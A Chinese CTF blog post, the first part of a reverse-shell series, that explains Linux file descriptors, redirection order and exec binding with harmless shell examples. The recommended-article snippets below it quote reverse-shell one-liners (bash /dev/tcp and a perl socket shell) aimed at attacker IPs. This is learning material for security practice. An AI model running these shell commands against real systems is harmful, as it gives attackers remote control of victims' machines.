[CTF]-反弹shell[1]

已于 2022-05-25 22:48:34 修改
阅读量617 收藏 2
点赞数 1
分类专栏: CTF 文章标签: linux bash 安全
于 2022-05-25 22:41:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/noob0208/article/details/124975100
版权

[一]反弹shell入门文件描述与重定向

0x01文件描述符

linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,
这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。

用户可以自定义文件描述符范围是:3-num,这个最大数字,跟用户的:ulimit –n 定义数字有关系,不能超过最大值

linux启动后,会默认打开3个文件描述符,分别是:

	标准输入: standard input    //0
   	正确输出: standard output   //1
   	错误输出: error output      //2

在这里插入图片描述

注意:
1.以后再打开文件,描述符可以依次增加
2.一条shell命令,都会继承其父进程的文件描述符,因此所有的shell命令,都会默认有三个文件描述符。

文件所有 输入输出 都是由该进程所有 打开的 文件描述符 控制的
(Linux一切皆文件,就连键盘显示器设备都是文件,因此他们的输入输出也是由文件描述符控制)

0X02 重定向

(1)输入重定向 < <<
(2)输出重定向 > >>

重点:

  1. bash 执行指令时,
检查存不存在重定向的符号->存在->文件描述符重定向->执行

(之前说过了,输入输出操作都是依赖文件描述符实现的,重定向输入输出本质上就是重定向文件描述符)

  1. 如果指令中存在多个重定向,那么不要随便改变顺序,因为重定向是从左向右解析的,改变顺序可能会带来完全不同的结果

(这一点我们后面会展示)

  1. < 是对标准输入 0 重定向

    > 是对标准输出 1 重定向

4.再强调一下,重定向就是针对文件描述符的操作

1.输入重定向

格式:

 [n]< word (注意[n]<之间没有空格)

说明:

将文件描述符 n 重定向到 word 指代的文件(以只读方式打开),如果n省略就是0(标准输入)

file文件中存在内容
‘hello world’

root@kali:~# cat 0< file
hello world

root@kali:~# cat < file
hello world

root@kali:~# 0< file cat
hello world

root@kali:~# < file cat
hello world

解释:
解析器解析到 < 以后会先处理重定向,将标准输入重定向file,之后cat再从标准输入读取指令的时候,由于标准输入已经重定向到了file ,于是cat就从file中读取指令了

在这里插入图片描述

2.输出重定向

格式:

[n]> word

root@kali:~# echo hello > file
root@kali:~# cat file
hello 

root@kali:~# echo world 1> file
root@kali:~# cat file
world

root@kali:~# > file echo hello
root@kali:~# cat file
hello

root@kali:~# > file echo world
root@kali:~# cat file
world

说明:
将文件描述符 n 重定向到word 指代的文件(以写的方式打开),如果n 省略则默认就是 1(标准输出)

在这里插入图片描述

注意:

  1. shell遇到 > 操作符,会判断右边文件是否存在,如果存在就先删除,并且创建新文件。不存在直接创建。 无论左边命令执行是否成功。右边文件都会变为空。

  2. >> 操作符,判断右边文件,如果不存在,先创建。以添加方式打开文件,会分配一个文件描述符[不特别指定,默认为1,2]然后,与左边的标准输出(1)错误输出(2) 绑定。

  3. 当命令:执行完,绑定文件的描述符也自动失效。0,1,2又会空闲。

  4. 一条命令启动,命令的输入,正确输出,错误输出,默认分别绑定0,1,2文件描述符。

  5. 一条命令在执行前,先会检查输出是否正确,如果输出设备错误,将不会进行命令执行

3.标准输出与标准错误输出重定向

格式:

&> word >& word

说明:

标准输出标准错误输出都定向到word代表的文件(以写的方式打开),两种格式意义完全相同,这种格式完全等价于 > word 2>&1 (2>&1 是将标准错误输出复制到标准输出&是为了区分文件1和文件描述符1的,详细的介绍后面会有)

在这里插入图片描述

解释
我们首先执行了一个错误的命令,可以看到错误提示被写入文件(正常情况下是会直接输出的),我们又执行了一条正确的指令,发现结果也输入到了文件,说明正确错误消息都能输出到文件。

在这里插入图片描述

4.文件描述符的复制

格式:

 [n]<&[m] / [n]>&[m] (这里所有字符之间不要有空格)

说明:

  1. 这里两个都是将文件描述符 n 复制到 m ,两者的区别是,前者是以只读的形式打开,后者是以的形式打开
    因此 0<&10>&1 是完全等价的(读/写方式打开对其没有任何影响)
  2. 这里的& 目的是为了区分数字名字的文件文件描述符,如果没有& 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件,而不是一个文件描述符
    这里就可以用上面的例子作为演示,将错误和正确的输出都输入到文件中

重点:

之前我们说过,重定向符号的顺序不能随便换,因为系统是从左到右执行的,我们下面就举一个例子

1. ll > file 2>&1

2. ll 2>&1 >file

与第一条指令类似的指令在上面我已经介绍过了,我们现在就来看看第二条指令的执行过程

在这里插入图片描述

1.首先解析器解析到 2>&1

在这里插入图片描述

2.解析器再向后解析到 >

在这里插入图片描述

5.exec 绑定重定向

格式:

exec [n] </> file/[n]

上面的输入输出重定向输入输出绑定文件或者设备以后只对当前的那条指令有效,如果需要接下来的指令都支持的话就需要使用 exec 指令

重点:

格式:

 [n]<>word

说明:

读写方式打开word指代的文件,并将n``重定向到该文件。如果n不指定的话,默认为标准输入

在这里插入图片描述

实例

root@kali:~# exec 6>&1
#将标准输出与fd 6绑定
 
root@kali:~# ls  /proc/self/fd/ 
0  1  2  3  6
#出现文件描述符6
 
root@kali:~# exec 1>suc.txt
#将接下来所有命令标准输出,绑定到suc.txt文件(输出到该文件)
 
root@kali:~# ls -al
#执行命令,发现什么都不返回了,因为标准输出已经输出到suc.txt文件了
 
root@kali:~# exec 1>&6
#恢复标准输出
 
 
root@kali:~# exec 6>&-
#关闭fd 6描述符

root@kali:~# ls /proc/self/fd/
0  1  2  3

说明: 使用前先将标准输入保存到文件描述符6,这里说明下,文件描述符默认会打开0,1,2 还可以使用自定义描述符 。然后对标准输出绑定到文件,接下来所有输出都会发生到文件。 使用完后,恢复标准的输出,关闭打开文件描述符6。

0X03 总结

  1. 重新设置命令的默认输入输出指向到自己文件(文件,文件描述符,设备其实都是文件,因为linux就是基于设备也是文件,描述符也指向是文件,哈哈)
  2. 扩展自己新的描述符,对文件进行读写操作

参考

https://xz.aliyun.com/t/2548#toc-8
https://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html

木拖把
关注
专栏目录
Linux反弹shell各种语言实现
SHELLCODE_8BIT的博客
04-22 2184
C编写实现Linux反弹shell [ Mi1k7ea ] https://github.com/pH-T/go-revshell https://github.com/vay3t/go-nc
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 486
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
Linux反弹shell(一)文件描述符与重定向
Hunt Counter
10-24 360
0X00 前言 由于在反弹shell的过程中有一些精简的语句一直没有弄明白,今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard inpu...
反弹shell 纯干货版 --D--K--盾
最新发布
2301_81040377的博客
06-26 995
本文主要讲解我已知的CTF中对VPS的利用的教程模块,所以本篇文章将会持续更新并且有改动。
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1655
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
[CTF]反弹shell总结
cosmoslin的博客
11-11 4646
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
Linux Shell文件描述符和重定向
常备不懈
04-03 1592
Linux操作系统中,Shell文件描述符和重定向是用于管理进程输入输出的重要概念。本文旨在深入探讨文件描述符和重定向的工作原理、用法,以及它们如何帮助进行高效的数据流管理。
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
08-26
CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解,从中可以学到许多实用的网络安全知识。 首先,我们来看一下第一个题目,黑客...
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1285
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
CTF-2021中国能源网络WEB题目全解
wulanlin的博客
12-31 1031
0x01 前言 在2021年10月15日的“中国能源网络安全大赛”,笔者对WEB题目进行了尝试,幸运的做出了所有题目。 感觉WEB的考点形形色色,其中有1道偏于黑盒测试的简单题目,4道是白盒审计类题目,还有一道是Python的反序列化题目,题目名称大致如下: 因为唯一的一道黑盒题目还是文件包含题目,所以笔者将题目源代码全部扒下来了,给大家提供复现环境。(flag自己创建)。 下面笔者将分享这次比赛的解题过程。 0x02 ezphp 这是一道很简单的题目,同时也被大家刷成了签到题。
CTF-普通用户提权
IT小学子的博客
05-03 3257
文章目录提权前提:1. 利用内核漏洞2. 利用明文root密码提权3. 利用定时计划任务4. 密码复用5. 利用zip提权 在我们拿下服务器web服务往往只是低权限用户,对于内网渗透,我们往往需要root权限,Linux系统提权包括使用溢出漏洞已及利用系统配置文件。 提权前提:   1.拿到低权限shell   2.被入侵机器上有nc,python,perl等常见linux下的工具  ...
反弹Shell
夏日 の blog
03-26 985
说明:端口可任意,但要保持一致而且不能被占用,以下均为攻击机登录被攻击机 bash连接 攻击机器输入 nc -lvp 7777 被攻击机器输入bash -i >& /dev/tcp/攻击机ip/7777 0>&1 然后攻击机器就相当于登陆了了被攻击机器 curl连接 在攻击机根目录下创建shell.txt,内容为bash -i >& /dev/tc...
反弹shell方法
Sea_Sand息禅
04-06 813
1、bash反弹shell kali ip:192.168.10.130 目标机上执行命令:bash -i >& /dev/tcp/192.168.10.130/8888 0>&1 kali机执行命令:nc -lvp 8888 bash -i:在本地打开一个bash终端 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 0...
De1ctf - shell shell shell记录
weixin_30376453的博客
08-08 352
虽然是N1CTF原题,但是自己没遇见过,还是做的题少,记录一下吧== 1.源码泄露,直接可以下到所有源码,然后代码审计到一处insert型注入: 这里直接带入insert里面,跟进去看看 insert函数对values进行正则替换,先调用get_columnsp 这里把数组分成以` , `连接的字符串并且以`反引号包在内,而正则则是匹配字符串中所有反引号之间的内容,将其取...
C/C++编写的反向SHELL
hambaga的博客
04-08 2072
转载来源: https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/ http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/ 下面是我根据原文的修改,将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。 ...
反弹shell
G653214的博客
12-15 285
反弹 shell的几种方式 linux文件描述符:linux shell下有三种标准的文件描述符,分别如下: 文件描述符 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 bash反弹 shell 靶机: bash -I >&/dev/tcp/192.168.1.1/9999 0>&1 攻击机: nc -nvlp 9999 命令注入直接获..
Reverse Shell Cheat Sheet
eT48_Sec
02-09 787
1.bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ope
关于反弹shell的学习
weixin_74020633的博客
06-14 688
反弹Shell(也称为反向Shell)是一种技术,通常用于远程访问和控制目标计算机。反弹Shell的工作原理是,目标计算机主动发起连接到攻击者的计算机,从而绕过一些常见的安全措施,如防火墙和NAT(网络地址转换)。这种技术常用于合法的远程管理和测试环境中,但也可能被恶意攻击者利用进行未授权的远程控制。通俗一点讲就是当存在一台攻击机和一台被攻击机时,攻击机(也就是客户端)连接被攻击机(服务端)叫做正向连接,那么反弹shell就是反向的连接,客户端为被攻击机,服务端为攻击机,由被攻击机连接攻击机。
C/C++ 匿名管道反弹CMDShell
热门推荐
CSDN
06-11 1万+
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实现远程控制和命令执行。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。
buuctf 反弹shell
08-17
在BUUCTF中,可以使用payload为`404_url={{1 1}}`来触发漏洞并实现反弹shell。这个payload会被当做代码执行,通过利用反弹shell可以直接创建后门文件等操作。在这个漏洞中,还可以使用`escapeshellarg()`函数来确保...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值